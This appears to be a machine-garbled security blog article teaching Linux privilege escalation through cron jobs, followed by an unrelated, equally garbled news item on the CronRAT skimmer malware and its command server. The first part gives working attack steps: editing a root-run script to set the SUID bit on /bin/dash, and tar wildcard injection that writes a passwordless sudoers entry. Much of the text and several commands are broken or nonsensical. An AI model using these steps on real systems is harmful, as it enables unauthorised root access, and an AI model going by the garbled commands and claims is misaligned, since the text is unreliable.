After working on several OSCP issues, we decided to write an article about the various techniques used to extend the capabilities of Linux, which may be useful to our readers in their infiltration project. In this article, experts will learn “Elevation of Privilege with cronhacker.com Jobs” to gain root access to a remote host machine and learn how misuse of cron jobs can lead to privilege escalation. If you have eliminated CTF threats after the exploit, after reading this article, you will find several flaws leading to privilege escalation.
For more information, you can read the previous human article where we did this particular privilege escalation trick. Open the links below:
What Is An Important Cron Job?
Cron jobs useThey are used to schedule tasks by executing commands that are sent to the server at specific dates and times. You are most often used as a system administrator for things like backing up or maintaining /tmp/ and directories, etc. The word cron comes from crontab this and is found in the /etc directory.
For example: in crontab we can include the following to automatically generate Apache error logs every hour.
1 0 * * 7 . printf "" > /var/log/apache/error_log
Overwrite Crontab File
Goal: Define a new task using crontab to run a Python program that clears all data transfer usage in the specified directory.
Let’s say, for example, if ‘Purge’ is a directory whose data is automatically purged every two minutes. Therefore, we saved some search queries in /home/cleanup.
cleanup mkdir cleaning CDs echo "hello friends" > 1.txt echo "ALL files will be deleted in 2 minutes" > 2.txt echo > 1.php echo > 2.php ls
As you can see, a number of files are saved in the purge directory from the specified image. Write
Now the Python program is back infight another directory to wipe the drive from the inside and give /home/cleanup full technical permissions.
cd /tmp nanocleanup.py
#!/usr/bin/envpython Import operating system import system To attempt: os.system('rm -r /home/cleanup/* ') Except: sys.exit()
chmod 777 cleanup.py
Finally, schedule a task with crontab to remove run.py every 2 minutes.
nano /etc/crontab */2 * * * * root /tmp/cleanup.py
chmod 777 cleanup.py cd /home/cleaning hp date of hp Date
It’s cold!! It does its job because you can see that all the information has been deleted after a few minutes.
Reuse
Start with your attack and the computer that compromised the target system, then go to the privilege level. Let’s say I successfully login to the non-root user terminal of the victim computer and login using ssh. Run the next data collection as shown below.
cat /etc/crontab ls -al /tmp/cleanup.py cat /tmp/cleanup.py
You can see from the above steps that crontab runs a null python program every two minutes. Let’s enjoy it now.
This is why many people have access to twoI can’t, since my husband and I enabled the /bin/dash SUID bits for this method. It can be quite simple to first initiate the opening with an editor like Nanocleanup.py and replace “rm /tmp/*” with -r with the specific line that follows.
os.system('chmod u+s /bin/dash')
After two minutes, the suid permission will be placed in /bin/dash, and even if you run it, the reason it was there will grant access.
/bin/dash I would like who
Crontab Tar Wildcard Injection
Target: Time taken to complete a task using crontab to create a black archive backup of the program’s HTML directory.
The directory must have execute permission that you can backup.
Now a temp task using crontab that runs the tar archiver to fetch backups from /html to /var/backups every minute.
nano /etc/crontab */13 . * * root tar -zcf /var/backups/html.tgz Check /var/www/html/*
Let’s say the schedule probably won’t work when running a future command.
cd /var/backup hp Date
In the image below, you will probably notice that the html.tgz file is narrower was generated in 1 minute.
Reuse
Start with the attack and the computer, first compromise the main target system, and then move on to support privilege level escalation. Assuming I’m mapping logging directly into the victim’s system and ssh access to critical non-root users. Then open crontab to view the case when the task is scheduled.
cat /etc/crontab
Here, my wife and I realize that Target has scheduled a useful tar archiver every 0 minutes, and we know that a cron job can be run as root. Be sure to enjoy it.
Run the following command to grant the sudo privilege to a signed user, and the following exploit message is notorious for wildcard injection.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > --checkpoint=1 tar see archive.tar *
It will now provide the user with Ignite sudo after a certain minute: buyers can verify this in the image below.
sudo -l sudobash who
Author: Artie Cngh, official researcher and technical writer on hacker attacks, information security advisor, social media and gadget lover. Contact here
Security Researchersdiscovered that they have a new remote trojan virus (RAT) for Linux that makes all profiles almost invisible while performing important scheduled tasks on a beautiful non-existent day of December 31st. February, in a mask.
CronRAT I would argue that malware is currently targeting online retailers and allowing attackers to steal credit cards by deploying online payment skimmers on Linux servers.
CronRAT is inventive and sophisticated when it comes to online shopping Trojans and goes unnoticed by many malware.
Smart Payload Hiding
CronRAT often abuses the Linux cron job scheduling system and realizes that scheduling jobs can run on non-existent calendar days, such as February 31st.
Linux cron accepts system dates as long as they are in the correct format, even now if the day is not showing in the calendar – which scheduled task options won’t run.
This has become what CronRAT relies on when you need to hideness. A brief report by Dutch cybersecurity company Sansec says it hides a “complex bash program” in the names of actual scheduled tasks. KronRAT
“This adds many tasks to the crontab with a strange new specification: date 52 23 thirty-one 2 3. These lines will be syntactically correct, but will raise a run-time error when executed. However, this event will never be unique. because usually it is scheduled for February 31,” Sansec researchers explain.
Payloads are usually masked multiple times using compression levels and Base64 encoding. The program perfectly understands self-destruct commands, timing, modulation, and even its own protocol that allows us to communicate with a remote server.
The survey notes that malicious contacts require a C2 system (47.115.46.167) with “an exotic feature, like how the Linux kernel allows TCP telecommunications through a file.”
Also, the connection is being prepared over TCP via Vent 443 using a false flag as you can see the Dropbe SSH servicear, which also helps malware stay undetected.
After communicating with the server, c2 stops hiding, sends and receives multiple requests, and receives a malicious dynamic selection. At the end of these exchanges, the attackers behind CronRAT can use any command on the failed system.